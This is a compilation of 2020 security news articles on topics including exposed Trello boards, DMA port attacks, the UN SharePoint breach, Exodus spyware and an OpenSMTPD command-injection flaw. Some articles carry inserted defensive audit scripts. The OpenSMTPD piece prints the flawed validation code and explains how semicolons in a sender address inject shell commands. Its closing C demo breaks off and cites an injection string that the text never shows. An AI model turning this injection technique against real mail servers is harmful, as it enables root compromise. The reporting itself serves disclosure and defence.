STE WILLIAMS

Trello exposed! Search turns up huge trove of private data

Hands up who’s used the increasingly popular online collaboration platform Trello?

Trello is great for organising to-do lists and for coordinating team tasks.

But it has its downsides too. While the default for Trello boards is set to ‘private’, many users set them to ‘public’ which means that anyone can see what’s posted there.

Not only that, search engines such as Google index public Trello boards, making it simple for anyone to uncover the boards’ contents using a specialised type of search called a ‘dork’.

And it’s surprising how much sensitive data there is.

Our global cybersecurity operations director at Sophos, Craig Jones, has been keeping an eye on this for a couple of years, first tweeting about it in 2018.

When news broke last week about office space company Regus exposing the performance ratings of hundreds of its staff via a public Trello board, Craig thought he’d take another look at what’s out there.

An enthusiastic Trello user himself, Craig quickly found a trove of highly sensitive data sprayed out by sizeable numbers of public Trello boards.

He found a board from a housing company detailing the fixes needed in each accommodation, including broken door locks.

Craig also discovered a staff board for what appears to be some sort of facilities company that listed names, emails, dates of birth, ID numbers, bank account information, and more.

And then there’s an HR board that details a specific job offer to someone, including their salary, bonus and contractual obligations.

There’s more.

He found a board relating to an Australian pub which included details of customer fraud, bucketloads of Gmail and social media passwords, and API keys, passwords and credentials belonging to a global IT household name.

Craig has contacted the companies where he can, to inform them their data is publicly accessible. Many have taken down the boards already.

Why do people set sensitive boards to public?

One would assume, in most cases, this is not deliberate. The design of Trello has changed over the years so it might be related in part to a past issue. It’s also possible that some are made public by one individual for a legitimate reason, the security implications of which are lost on other users of the same board.

Some boards are set up, made public, and eventually forgotten (although not by Google). It’s the latest version of the whole shadow IT problem where people use tools they don’t fully understand how to use securely.

Whose fault is it?

Sure, users need to bear some responsibility over keeping their data private. But Craig also believes search engines aren’t helping here.

For me, any benefit in indexing Trello boards is far outweighed by the risk of making it possible to access inadvertently exposed data. While we should all take responsibility for keeping our Trello boards private, I’d love to see Google and others stop the indexing of them in the first place.

What to do

If you are a Trello user, go and check the status of your boards and set anything with sensitive data in it to “private”.
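Checking board visibility by hand does not scale past a handful of boards, so here is an added example that audits every board your Trello API token can see and flags the public ones. It is not Naked Security’s or Trello’s code; it assumes the REST endpoints, field names and `permissionLevel` values named in the docstring, and the key/token environment variables are an assumption too. Without credentials it runs over a constructed sample so the logic can be seen offline.

```python
"""Audit which of your Trello boards are public, and optionally make them private.

Added example, written for this article; it is not Naked Security's or Trello's code.
It assumes the Trello REST API endpoints and field names below (check Trello's
current docs before relying on them):
  GET  /1/members/me/boards?fields=name,url,prefs
       -> list of boards, each with "id", "name", "url" and
          "prefs": {"permissionLevel": "private" | "org" | "public"}
  PUT  /1/boards/{id}/prefs/permissionLevel?value=private
An API key and token are read from TRELLO_KEY / TRELLO_TOKEN; without them the
script runs the audit over a constructed sample instead of calling the API.
"""
import json
import os
import urllib.parse
import urllib.request

API = "https://api.trello.com/1"  # assumed base URL of the Trello REST API


def public_boards(boards):
    """Return the boards whose permissionLevel is 'public'.

    A public board is readable by anyone with the URL and, as the article
    notes, gets indexed by search engines. A board with no prefs block is
    flagged as 'unknown' so nothing silently passes the audit."""
    flagged = []
    for board in boards:
        prefs = board.get("prefs") or {}
        level = prefs.get("permissionLevel")
        if level == "public" or level is None:
            flagged.append({"id": board.get("id"), "name": board.get("name"),
                            "url": board.get("url"), "level": level or "unknown"})
    return flagged


def fetch_boards(key, token):
    """Call the (assumed) boards endpoint and return the decoded JSON list."""
    query = urllib.parse.urlencode({"key": key, "token": token,
                                    "fields": "name,url,prefs"})
    with urllib.request.urlopen(f"{API}/members/me/boards?{query}", timeout=30) as resp:
        return json.load(resp)


def make_private(board_id, key, token):
    """Flip one board to private via the (assumed) permissionLevel endpoint."""
    query = urllib.parse.urlencode({"key": key, "token": token, "value": "private"})
    req = urllib.request.Request(
        f"{API}/boards/{board_id}/prefs/permissionLevel?{query}", method="PUT")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.status == 200


# Constructed sample of what the boards endpoint returns (not real boards).
SAMPLE_BOARDS = [
    {"id": "b1", "name": "Sprint planning", "url": "https://trello.com/b/b1",
     "prefs": {"permissionLevel": "private"}},
    {"id": "b2", "name": "HR offers", "url": "https://trello.com/b/b2",
     "prefs": {"permissionLevel": "public"}},
    {"id": "b3", "name": "Facilities rota", "url": "https://trello.com/b/b3",
     "prefs": {"permissionLevel": "org"}},
    {"id": "b4", "name": "Legacy board", "url": "https://trello.com/b/b4"},
]


def audit(boards, fix=False, key=None, token=None):
    """Report the boards that fail the audit; with fix=True and credentials, make them private."""
    report = []
    for board in public_boards(boards):
        action = "flagged"
        if fix and board["level"] == "public" and key and token:
            action = "made private" if make_private(board["id"], key, token) else "fix failed"
        report.append((board["name"], board["level"], action))
    return report


if __name__ == "__main__":
    key, token = os.environ.get("TRELLO_KEY"), os.environ.get("TRELLO_TOKEN")
    boards = fetch_boards(key, token) if key and token else SAMPLE_BOARDS
    for name, level, action in audit(boards, fix=os.environ.get("TRELLO_FIX") == "1",
                                     key=key, token=token):
        print(f"{level:8} {action:13} {name}")
```

Run it with `TRELLO_KEY` and `TRELLO_TOKEN` set to see your own boards; add `TRELLO_FIX=1` to flip the public ones to private. Flipping a board private stops new exposure only: as the article says below, anything a search engine has already cached stays visible until you ask for it to be removed.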

If you know of any exposed data – perhaps data relating to you or a company you’ve worked at – there are two routes to getting it taken down.

One is to contact the admin who set up the board. In many cases, that won’t be possible, so a second option is to contact Trello, asking for the board to be made private.

But even after doing that, content remains cached on search engines for a period of time, which is why it’s also necessary to ask Google to remove the content from search, or to send a cache-flushing request (which will cause Google to re-index it, hopefully receiving a 404 from Trello).


Latest Naked Security podcast


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xSnZVFqX8_4/

S2 Ep24: Tinder, angry customers and weleakinfo takedown – Naked Security Podcast

This week we discuss 70,000 images being stolen from Tinder, the weleakinfo.com FBI bust and how Sonos annoyed its longstanding customers.

Host Anna Brading is joined by Sophos experts Mark Stockley, Greg Iddon and producer Alice Duckett.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/egQbHH_Ja98/

Difficult season: Antivirus-flinger Avast decides to ‘wind down’ Jumpshot

Avast will pull the plug on Jumpshot, its controversial data analytics business, after it was revealed the company was harvesting its users’ data.

The Brit antivirus firm ran into trouble last month when a security researcher, Wladimir Palant, found that the company’s Firefox browser extensions were collecting customers’ browsing data, including URLs of sites they had visited, and per-device unique IDs, and selling it, apparently deanonymised, to customers such as Revlon, Tripadvisor and Intel.

The extensions were booted out of the Mozilla and Google web stores following the story. In response, Avast said it had stopped gathering people’s data “for any other purpose than the core security engine, including sharing with Jumpshot”.

But a PCMag investigation publicised earlier this week found that Avast can still collect users’ browser history through its main antivirus application, or through AVG antivirus, which it also owns. The data is harvested through the software’s Web Shield component, which scans URLs on your browser to detect malicious or dodgy websites, it claimed. Jumpshot denied the allegations.

Avast announced the closure, which it termed a “winding down” in a press release this morning, saying that it would “terminate its provision of data” to Jumpshot immediately and eventually close the business. It added: “Jumpshot may not use any existing data provided by Avast and no further data will be provided by Avast.”

In a linked blog post, the company’s newish chief exec, Ondrej Vlcek, said Jumpshot had acted “fully within legal bounds”. The decision to close the company was made because it did not fit with its privacy policies for 2020 and beyond, he said.

“Protecting people is Avast’s top priority and must be embedded in everything we do in our business and in our products. Anything to the contrary is unacceptable,” the blog post read.

He added that the closure would “impact” hundreds of employees across the company’s five global offices. The company intends to continue paying its suppliers “in full as necessary” during the closedown.

The closure will not affect Avast’s financial results, the company said in a trading update. It forecasts mid-single-digit growth in underlying revenue for the current year, excluding Jumpshot. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/avast_to_close_jumpshot/

Election Security 2020: How We Should Allocate $425M in Funding

Too many states and municipalities still rely on aging systems; it’s time they upped their game and treated election technology like they would any other security project.

The old curse, “May you live in interesting times,” seems appropriate these days, as we look to navigate the challenges of securing the election systems in the US. 

In December 2019, the federal government allocated $425 million for states to upgrade their election security. This is the second round of funding to protect voting systems; the first, in 2018, totaled $380 million. Roughly 90% of that money was allocated for new voting machines and other cybersecurity projects for the elections. However, many feel that both allocations are not enough to properly invest in election security, including hiring cybersecurity experts, conducting post-election audits, and upgrading registration databases and voting machines. 

This is why we must focus on the most effective areas to allocate the recent funding to improve the security of our elections.

How do we start?
The US is known as a technologically advanced country, and there are many options to take on this journey. Yet, the reality is that many states and municipalities still rely on aging systems and infrastructure, which are often complex and decentralized. This fragmentation problem alone is enough to give us pause. Combine that with limited resources and a growing gap in cybersecurity talent, and we have the potential for a runaway train.

First and foremost, this problem needs to be looked at just as a typical organization would with a security budget. An effort of this magnitude needs impeccable planning and execution. Here are five tips to get that process started in the right way.

  • Hire a CISO specifically for election security projects. Just like any other organization would hire a security executive to oversee security efforts, federal and state governments must do the same. While we have heads of security for states and sometimes for municipalities, there is so much decentralization, it’s difficult to get all security experts on the same page and agree to what is necessary. This also helps the common problem of lack of transparency between states and the federal government.
  • Evaluate the current environment and build a custom election security model. Everything from the network and firewall level down to the application and data layer needs to be evaluated thoroughly and confirmed to be fully deployed, operational, and effective. We can often learn from other organizations, from different industries, that have been successful in implementing a strong, transparent, and effective security model for their company. It would be helpful to seek the advice and counsel of those leaders who have attained that level, and who can also help you see any blind spots.
  • Protect the applications in the actual voting systems. We are often quick to slap on perimeter security in hopes that these measures will take care of a majority of potential incidents. But this way of thinking is limited. If there is one thing that the past 15 years has taught us, it is that the perimeter is breaking down, with many experts maintaining that it’s already effectively dissolved. This gave rise to frameworks such as zero-trust security, which, given the use of cloud technologies and the collaboration economy, plainly states that all aspects of technology and security must defend themselves.

    We can’t rely solely on firewall and network security anymore. We must protect the applications and the data itself. This includes implementing extensive application testing protocols — such as Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), and Software Composition Analysis (SCA) — throughout the software development lifecycle, to ensure that your software code isn’t exploited and used to bring down critical infrastructure and other election system technologies. Or worse yet, that your election software isn’t hacked, and the actual votes and election results altered thereby hacking our democracy.

  • Understand the risks of using third-party development and security companies. Outsourcing development and security projects can introduce risks that any organization must consider before proceeding with this model. These potential hazards can negatively impact the business’s bottom line and bring critical projects to a grinding halt before they can even be launched. Do these third-party vendors deeply understand the problem and the business outcomes you need? It’s also important to know their due diligence and software quality practices when it comes to the development and security of the applications that power election systems.
  • Tap threat research, SOCs, and incident response. It’s well understood that you can’t protect what you can’t see. Make sure there is a solid operations center on this effort at all times, and that you’re learning from the data streams it’s uncovering. This includes research about particular threats, that can feed into an overall incident response plan in the event that something happens. SIEMs and security management platforms can help in this effort.

The Bottom Line
This is not a short-term journey, and it’s certainly not an easy one, but it’s possible to get there if we do it right. It takes the involvement and collaboration between states, municipalities and the federal government, as well as security companies that can help provide guidance, and third parties that can help in development and implementation efforts. Let’s not waste any more time and money. Let’s work together and spend this latest allocation in the best and smartest ways possible. Let’s work together to keep our democracy hack-proof.


Craig Hinkley joined WhiteHat Security as CEO in early 2015, bringing more than 20 years of executive leadership in the technology sector to this role. Craig is driving a customer-centric focus throughout the company and has broadened WhiteHat’s global brand and visibility …

Article source: https://www.darkreading.com/risk/election-security-2020-how-we-should-allocate-$425m-in-funding-/a/d-id/1336885?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Enterprise Hardware Still Vulnerable to Memory Lane Attacks

Most laptops, workstations, and servers are still vulnerable to physical attacks via direct memory access, despite mitigations often being available, report says.

Hardware makers have lagged behind in protecting even the latest systems from attacks through their ports, leaving users’ and companies’ systems open to exploit by anyone who can snag some alone time with the targeted system, security firm Eclypsium stated in a report published on January 30.

The attacks exploit the direct memory access, or DMA, feature of some computers and servers, which allows peripherals to directly access the system’s memory. In a recent test of two modern laptops, security researchers at the firm found that they could easily compromise the systems — one through a port and the other through a supply chain–type attack by opening the case — even though firmware makers have solutions available to mitigate the DMA security issues, says Jesse Michael, principal researcher with Eclypsium.

“This is something that has been traditionally difficult for people to fix,” he says. “Because even though there are security features and capabilities and protections that are being put into silicon and the hardware by Intel and the chipset vendors, … it takes a while for the different vendors to write code that enables and actually configures these hardware protections to secure the system before it gets into customer hands.”

Not a New Issue
The attacks are not new. In 2016, Ulf Frisk, a security researcher based in Sweden, published PCILeech, a program that compromises systems through ports to give direct high-speed access to a system’s memory. Such ports are often used to drive an external monitor, allow a graphics upgrade, or expand memory. A December 2016 video of the attack shows him recovering the FileVault password of a MacBook Air just by connecting his attack system through the Thunderbolt port.

Since 2017, the makers of laptops, workstations, and servers have had the tools to harden their devices against such attacks, but many have not taken the steps to deliver a secure system to end users. Eclypsium’s researchers, for example, bought a new Dell XPS laptop — a model introduced in October 2019 — and found that it had PCI-over-Thunderbolt enabled by default. They easily exploited the issue, Michael says.

“While device vendors, chip vendors, and operating system vendors have all developed new controls to defend against these threats, our research shows that many devices with built-in hardware protections continue to be vulnerable,” Eclypsium stated in the report.

In December 2019, Dell issued an advisory and mitigation steps for the issue. Other laptop lines are not affected, the company stated.

Giving anyone physical access to a system poses a security risk. Hardening systems against the autorun setting for devices plugged into the USB port, for example, took years and significant hacks at the US Department of Defense to spur action. Leave your laptop unattended in a cafe and someone could plug in a malicious device that compromises the system in minutes.

Yet market pressures are pushing more vendors to adopt DMA to give workers and consumers the ability to plug in an external monitor or the ability to significantly boost graphics power.

“People think of the boundaries of the laptop as the security perimeter, but if you have a modified mouse or keyboard, you are potentially owned,” says Eclypsium’s Michael. “We want things to go faster and faster, so we are adding capabilities to these externals ports. Now we are bringing all PCI capabilities through this external port, and there are some interesting security ramifications [extending features] outside the case.”

The research also demonstrates that such attacks could be a supply-chain danger for companies, if attackers could get several minutes of hands-on access to a system to implant malicious hardware. In their second test, the researchers replaced an HP laptop’s wireless card with a programmable development platform, which could modify system RAM during boot, gaining control of the device, Eclypsium stated.

HP issued an updated version of the BIOS to fix the issue last week.

While these attacks are not new, their continued existence underscores that companies need to pay more attention to the firmware of devices they acquire, says Eclypsium. In 2016, Frisk published a tool for exploiting DMA weaknesses in systems. Known as PCILeech, the program allows attackers to target Windows, Linux, and Mac systems.

“PCILeech is capable of inserting a wide range of kernel implants into the targeted kernels — allowing for easy access to live RAM and the file system via a ‘mounted drive’,” Frisk wrote. “It is also possible to remove the logon password requirement, loading unsigned drivers, executing code and spawn system shells.”

Since then, chipset and firmware vendors have produced solutions to the issues, but often even the latest systems do not have those mitigations turned on, Eclypsium’s Michael says.
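The mitigations Michael refers to are ones an administrator can verify rather than assume. Here is an added example (not Eclypsium’s tooling and not from the article) that reads the Linux kernel’s sysfs interfaces to report whether an IOMMU is active and how each Thunderbolt domain is configured. The sysfs paths and the meaning of the `security` and `iommu_dma_protection` attributes are assumptions taken from the kernel’s Thunderbolt admin guide; the `root` parameter and the constructed sample tree exist so the check can be demonstrated offline.

```python
"""Check whether a Linux host has its DMA protections actually turned on.

Added example for this article; it is not Eclypsium's tooling and does not test
the hardware itself. It reads the kernel's sysfs interfaces (assumed layout, as
described in the kernel's admin-guide Thunderbolt documentation):
  /sys/kernel/iommu_groups/<n>/                  present only when an IOMMU is active
  /sys/bus/thunderbolt/devices/domainN/security   Thunderbolt security level:
                                                   none | user | secure | dponly | usbonly | nopcie
  /sys/bus/thunderbolt/devices/domainN/iommu_dma_protection
                                                   "1" when firmware and kernel enforce
                                                   IOMMU-based DMA protection for hot-plugged devices
`root` defaults to "/" and can point at a constructed tree for testing.
"""
import tempfile
from pathlib import Path


def _read(path):
    """Return a sysfs attribute as a stripped string, or None if it does not exist."""
    try:
        return Path(path).read_text().strip()
    except OSError:
        return None


def dma_status(root="/"):
    """Collect the raw facts: is an IOMMU active, and how is each Thunderbolt domain set up."""
    root = Path(root)
    groups = root / "sys/kernel/iommu_groups"
    # The directory can exist while the IOMMU is off; only populated groups count.
    iommu_active = groups.is_dir() and any(groups.iterdir())
    domains = {}
    tb = root / "sys/bus/thunderbolt/devices"
    if tb.is_dir():
        for dom in sorted(tb.glob("domain*")):
            domains[dom.name] = {
                "security": _read(dom / "security"),
                "iommu_dma_protection": _read(dom / "iommu_dma_protection"),
            }
    return {"iommu_active": iommu_active, "domains": domains}


def findings(status):
    """Turn the raw status into a list of weaknesses a device with port access could use."""
    out = []
    if not status["iommu_active"]:
        out.append("no active IOMMU: a DMA-capable peripheral can read and write all of RAM")
    for name, dom in status["domains"].items():
        if dom["security"] in (None, "none"):
            out.append(f"{name}: Thunderbolt security level is 'none', so PCIe tunnels are "
                       "opened for any device that is plugged in")
        if dom["iommu_dma_protection"] != "1":
            out.append(f"{name}: kernel DMA protection is not enabled for this domain")
    return out


def make_sample_tree(protected):
    """Build a constructed sysfs-like tree in a temp dir (for offline demonstration only)."""
    root = Path(tempfile.mkdtemp())
    dom = root / "sys/bus/thunderbolt/devices/domain0"
    dom.mkdir(parents=True)
    if protected:
        (root / "sys/kernel/iommu_groups/0").mkdir(parents=True)
        (dom / "security").write_text("user\n")
        (dom / "iommu_dma_protection").write_text("1\n")
    else:
        (root / "sys/kernel/iommu_groups").mkdir(parents=True)  # exists but empty: IOMMU off
        (dom / "security").write_text("none\n")                 # no iommu_dma_protection file
    return str(root)


if __name__ == "__main__":
    for line in findings(dma_status("/")) or ["no DMA weaknesses found"]:
        print(line)
```

On a host without Thunderbolt the domain list is empty and only the IOMMU check applies; that check still matters for the internal-slot case in the article (the wireless card swapped for a development board), since an IOMMU is what confines a device in a mini-PCIe or M.2 slot as much as one behind a port.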

“We know how to solve it; it just isn’t in everybody’s hands yet,” he says. “And some vendors, like [the makers of] a gaming laptop, they might not ever put this kind of solution in.”


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline …

Article source: https://www.darkreading.com/vulnerabilities---threats/enterprise-hardware-still-vulnerable-to-memory-lane-attacks/d/d-id/1336921?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

United Nations Data Breach Started with Microsoft SharePoint Bug

A remote code execution flaw enabled a breach of UN offices in Geneva and Vienna, as well as the Office of the High Commissioner for Human Rights.

A cyberattack targeting United Nations offices in July 2019 reportedly stemmed from Microsoft SharePoint vulnerability CVE-2019-0604, which was patched early last year and has been under active attack since then. A senior UN IT official estimates some 400GB of data was downloaded.

News of the breach comes from a confidential document from the UN Office of Information and Technology. The file was leaked to The New Humanitarian and seen by the AP, which reports 42 servers were compromised and another 25 are considered suspicious. The majority of these servers are at the UN offices in Geneva and Vienna. Attackers were also able to access Active Directories, likely obtaining human resources, insurance systems, databases, and network data.

It’s so far unclear exactly which documents and data the attackers stole; however, those who viewed the report imply internal documents, emails, databases, and commercial information may have been accessed. The sensitive nature of information handled by these offices could have major consequences for UN staff and the many people it works with around the world.

Reports indicate the UN hid the incident, which reportedly began in July 2019 and was noticed a month later. Employees were alerted to change their passwords but not notified of a breach, even though staff records, health insurance, and commercial contract data were compromised in the incident. Attackers were able to infiltrate pieces of IT infrastructure, including system controls, user and password management tools, and firewalls.

The attackers reportedly gained access via CVE-2019-0604, a known remote code execution vulnerability in Microsoft SharePoint that was disclosed in February 2019. Since a patch was released, security researchers have seen the bug exploited in active attacks. In May 2019, both the Saudi Arabia National Cyber Security Center and Canadian Cyber Security Centre reported attackers were using the China Chopper web shell to gain initial access and exploit this flaw.

This vulnerability gave intruders the access they needed to move throughout UN networks. So far, the attackers have not been identified, though it’s believed they are sophisticated threat actors.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/threat-intelligence/united-nations-data-breach-started-with-microsoft-sharepoint-bug/d/d-id/1336926?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Government spyware company spied on hundreds of innocent people

In March 2019, researchers with a group called Security Without Borders – a non-profit that often investigates threats against dissidents and human rights defenders – identified more than 20 government spyware apps squatting in plain sight, pretending to be harmless, vanilla apps on Google’s Play store.

Those apps – which were just a decoy through which government spyware called Exodus was installed on targets’ phones – were anything but harmless. In a two-stage process, they snorted up lists of installed apps, browsing history, contact lists from numerous apps, text messages – including encrypted texts – location data, and app and Wi-Fi passwords. The malware could also activate cameras and microphones to capture both audio and video, as well as take screenshots of apps as they were being used.

That spyware came from an Italian surveillance company called eSurv, and though it was good at hacking people’s phones, it stunk at securing its own data. The spyware opened up a remote command shell on infected phones, but it failed to use any sort of encryption or authentication, so that anyone on the same Wi-Fi network as an infected device could wander in and hack it.

But it was that shoddy security that’s led authorities to a stunning discovery: as Bloomberg reported earlier this month, eSurv employees have allegedly spied on unwitting, innocent Italian citizens with the powerful surveillance technology.

They allegedly did it with a lot of brass. According to court documents seen by Bloomberg, eSurv employees would play aloud secretly recorded phone conversations in the office. And while it was selling its spyware to law enforcement agencies, it also allegedly struck a deal with a company – ‘Ndrangheta – that’s said to be linked to the Mafia.

Unearthing the snooping apps

The man behind Exodus is Italian developer Diego Fasano. After he had successfully created an app for doctors to view medical records, a friend told him that he should get into the surveillance business, where investigators have been clamoring for help in penetrating communications encrypted by messaging apps such as WhatsApp and Signal. In 2014, he founded eSurv, which sells surveillance technology to police and intelligence agencies.

How it worked: with the help of Italy’s telecoms, the company would dupe people into downloading what appeared to be an innocuous app that would ostensibly fix network errors on their phone. Fasano said that police, in cooperation with mobile phone networks, would shut down a targeted person’s data service. Next, they’d send instructions to use Wi-Fi to download an app to restore service. The app was designed to look like it was associated with telecom providers, with names such as “Operator Italia.”

The real purpose: to give law enforcement access to a device’s microphone, camera, stored files and encrypted messages. Fasano sold Exodus to prosecutors’ offices across the country, including to the country’s foreign intelligence agency, L’Agenzia Informazioni e Sicurezza Esterna.

A security blunder led to Exodus’s undoing, however. According to authorities, in 2018, a prosecutor’s office in the city of Benevento was using Exodus to hack the phones of suspects in an investigation. In October, a technician noticed that the network connection kept dropping out.

After doing some sleuthing, the tech found that Exodus wasn’t working off a secure internal server accessible only to the Benevento prosecutor’s office, as it was supposed to do. Rather, it was connecting to a server accessible to anyone on the internet, protected only by a username and password.

That meant that data covertly collected by Italian prosecutors from suspects’ phones in the course of some of the country’s most sensitive investigations – of Mafia cases, terrorist cases, and corruption cases – were at risk of interception by hackers. That included thousands of photos, recordings of conversations, private messages and emails, videos, and other files gathered from hacked phones and computers – a total of about 80 terabytes of data, or roughly 40,000 hours of HD video, stored in unencrypted form on what turned out to be an Amazon Web Services server in Oregon.

Authorities don’t know if that server was ever hacked.

Prosecutors filed criminal charges against eSurv for unlawfully collecting and storing private communications, transferring them overseas, and failing to keep secure “sensitive personal data of a judicial nature.”

Naples prosecutors expect the investigation to be completed later this year. Meanwhile, Fasano and another eSurv executive, Salvatore Ansani, have been charged with fraud, unauthorized access to a computer system, illicit interception and illicit data processing. Kept under house arrest for three months, they’ve been released and are now awaiting the next stage of their legal proceedings, which will likely result in a trial.

Further investigation found that a subset of eSurv’s 20 employees – devoted to working on Exodus and led by Ansani, they called themselves The Black Team – used the spyware to target law-abiding Italian citizens who were never named as suspects in investigations. Nonetheless, those citizens’ phones were bugged, and their private conversations were recorded, for reasons that authorities say are still unknown.

According to police documents, the Black Team spied on more than 230 people whom police weren’t authorized to surveil. Some of those people were referred to in eSurv’s internal files as “The Volunteers” – in other words, they may have been unwitting guinea pigs.

Investigators are still combing through the vast amount of data they seized from eSurv as they try to figure out the purpose for the illegal data collection. Was it intended for blackmail? For fun? For spying? For illegal surveillance on behalf of the Mafia?

At this point, one prosecutor – Eugenio Facciolla, who’s at the center of a corruption scandal – has been charged with forging documents in an effort to obstruct or mislead a police investigation into an ‘Ndrangheta-led illegal logging operation that involved chopping down thousands of trees in some of Italy’s national parks.

In November, the agency that handles prosecutor appointments said that it was removing Facciolla from his office in Castrovillari, on the grounds that he had “abused his functions.” Facciolla is appealing the decision. Yes, he says, he supplied Exodus to other companies, but, according to his lawyer, Vincenzo Ioppoli, the spyware is “like a gun.”

Once you have sold it, you don’t know how it will be used.



Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/08noJbBMayg/

If only 3 in 100,000 cyber-crimes are prosecuted, why not train cops to bring these crooks to justice once and for all, suggests think-tank veep

Enigma A plague of ignorance and misplaced priorities in government and law enforcement, from neighborhood cops all the way up to international bodies, is allowing cyber-crime to run rampant.

So says Mieke Eoyang, long-time US government policy adviser and veep of the national security program at Washington DC think tank Third Way. Speaking at the 2020 Enigma conference in San Francisco on Wednesday, Eoyang made the case for allocating time and money to finding and snaring internet crooks, hauling them into court, and shutting down this criminality. In other words, proactively tackling criminals, rather than relying on fending off attacks.

After citing figures from Uncle Sam that show only three in 1,000 cyber-crimes are actually prosecuted – the actual ratio could be closer to three in 100,000 as the FBI tends to underestimate the extent of cyber-crime, she explained – Eoyang said police and agents are not told to go after online fraudsters nor given the training and resources to do so anyway.

“We continue to blame users for not avoiding clicking on every phishing link,” said Eoyang, a former staff director for the US House of Representatives Permanent Select Committee on Intelligence.

“When a breach becomes public the response all too often is to blame the victim company. We are focusing on defending systems over identifying, pursuing, and bringing to justice the person behind the cyber-crime.”

The problem, Eoyang argued, is not a lack of people-power or money, but rather a set of misplaced priorities and ignorance at the city, county and state level. Officers lack the basic skills to pursue online crimes, instead handing cases off to overworked and undermanned specialized cybercrime units.

As a result, in many cases, cybercrime falls through the cracks, considered too big for your neighborhood plod and not significant enough to catch the attention of elite federal or national cyber-crime investigation teams.

One easy solution would be to expand the skill set of rank-and-file officers to include basic IT and data security techniques, she opined.


“This is an overlooked area that is very specialized in the FBI and not something they all know about,” Eoyang said. “We need to rebalance resource investment in this area, we need to build cyber investigation-capable law enforcement.”

There is also the matter of international cooperation, and in that area authorities need to be a bit more creative.

For example, Eoyang pointed out that even though an online criminal may be shielded from extradition by operating out of somewhere like Russia, they almost inevitably expose themselves to arrest when they opt to spend their ill-gotten gains in Malta, Israel, and high-end destinations. To that end, building diplomatic ties and getting cooperation from law enforcement in other countries will be critical.

One area where Eoyang doesn’t see the need for the government to step up its efforts, however, is busting encryption. Drawing applause from the crowd of security professionals in attendance, the former congressional staffer declared that Feds-only backdoors are simply not the way to go.

“This [strong end-to-end encryption] is not the only thing that stands in the way of their ability to investigate,” she said. “They don’t even know how to write a proper request to the tech companies for the information they already can access.” ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/30/cops_crime_failure/

Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage

Code dive The OpenBSD project’s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.

Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon’s default configuration, or locally and remotely if the daemon is using its “uncommented” default configuration, in which it listens on all interfaces and accepts external mail. Getting root access means it’s game over: the machine is now yours.

This bug is bad news for anyone running a public-facing, external-mail-accepting OpenSMTPD deployment. Check for security updates to close the hole, apply this patch, or disable the daemon. The versions shipping with OpenBSD 6.6, the latest available, and with Debian testing, aka Bullseye, are vulnerable to attack; other releases may be as well. The bug dates back to May 2018.

How it went wrong

After it receives an email, OpenSMTPD invokes a mail delivery agent to place the incoming message in the recipient’s inbox on the system. The delivery agent is invoked by OpenSMTPD executing a shell command, which includes the sender’s address as a command-line parameter. The sender’s address was supplied by whichever email client earlier connected to OpenSMTPD to send the message.

Passing this address straight to the shell as a parameter is dangerous because hackers can exploit this to inject extra commands to be executed. To avoid this, OpenSMTPD has a string called MAILADDR_ALLOWED that defines the non-alpha-numeric characters allowed in a valid address. In addition, the string MAILADDR_ESCAPE contains characters that are converted to a colon character to neutralize any threats. So, an address is valid if it contains only alpha-numeric characters, full-stops, and anything else in MAILADDR_ALLOWED. And anything that’s also in MAILADDR_ESCAPE gets converted to a colon. Thus whatever sender address is supplied by an email client, it can’t smuggle in extra commands.

Unfortunately, OpenSMTPD’s sender address validation code, smtp_mailaddr(), accidentally jumps the gun and approves dangerous sender addresses that can inject arbitrary commands into delivery agent invocations. An email address has two parts, the local part and the domain part. For corrections@theregister.co.uk, corrections is the local part, and theregister.co.uk is the domain part. If the sender’s address has an invalid local part, and an empty domain part, smtp_mailaddr() tries to helpfully add a default domain to the address, and then just OKs the string for use on the command line, ignoring the fact the local part is invalid.

Thus an address whose local part contains invalid characters that inject commands into the command line used to invoke the delivery agent will sail through validation when it should be rejected.

Here’s the C code at the heart of the security blunder – smtp_mailaddr() should return the value 1 for a valid address and 0 for an invalid address when checking the address in the string pointed to by maddr:

2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191     const char *domain)
2192 {
....
2218         if (!valid_localpart(maddr->user) ||
2219             !valid_domainpart(maddr->domain)) {
....
2229                 if (maddr->domain[0] == '\0') {
2230                         (void)strlcpy(maddr->domain, domain,
2231                             sizeof(maddr->domain));
2232                         return (1);
2233                 }
2234                 return (0);
2235         }
2236
2237         return (1);
2238 }

“If the local part of an address is invalid (line 2218) and if its domain name is empty (line 2229), then smtp_mailaddr() adds the default domain automatically (line 2230) and returns 1 (line 2232), although it should return 0 because the local part of the address is invalid (for example, because it contains invalid characters),” the Qualys team explained in its summary.

“As a result, an attacker can pass dangerous characters that are not in MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (‘;’ and ‘ ’ in particular) to the shell that executes the [mail delivery agent] command.”
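To make the control-flow defect concrete, here is an added example that is not OpenSMTPD's code: all names prefixed demo_ are this example's own, the local-part and domain checks are simplified stand-ins for valid_localpart() and valid_domainpart(), and the MAILADDR_ALLOWED value is assumed to match smtpd.h. It reproduces the branch structure of lines 2218-2237, puts one hardened form beside it, and runs both over a valid sender and the injection string quoted above:

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed to match MAILADDR_ALLOWED in OpenSMTPD's smtpd.h; verify there. */
#define DEMO_MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"
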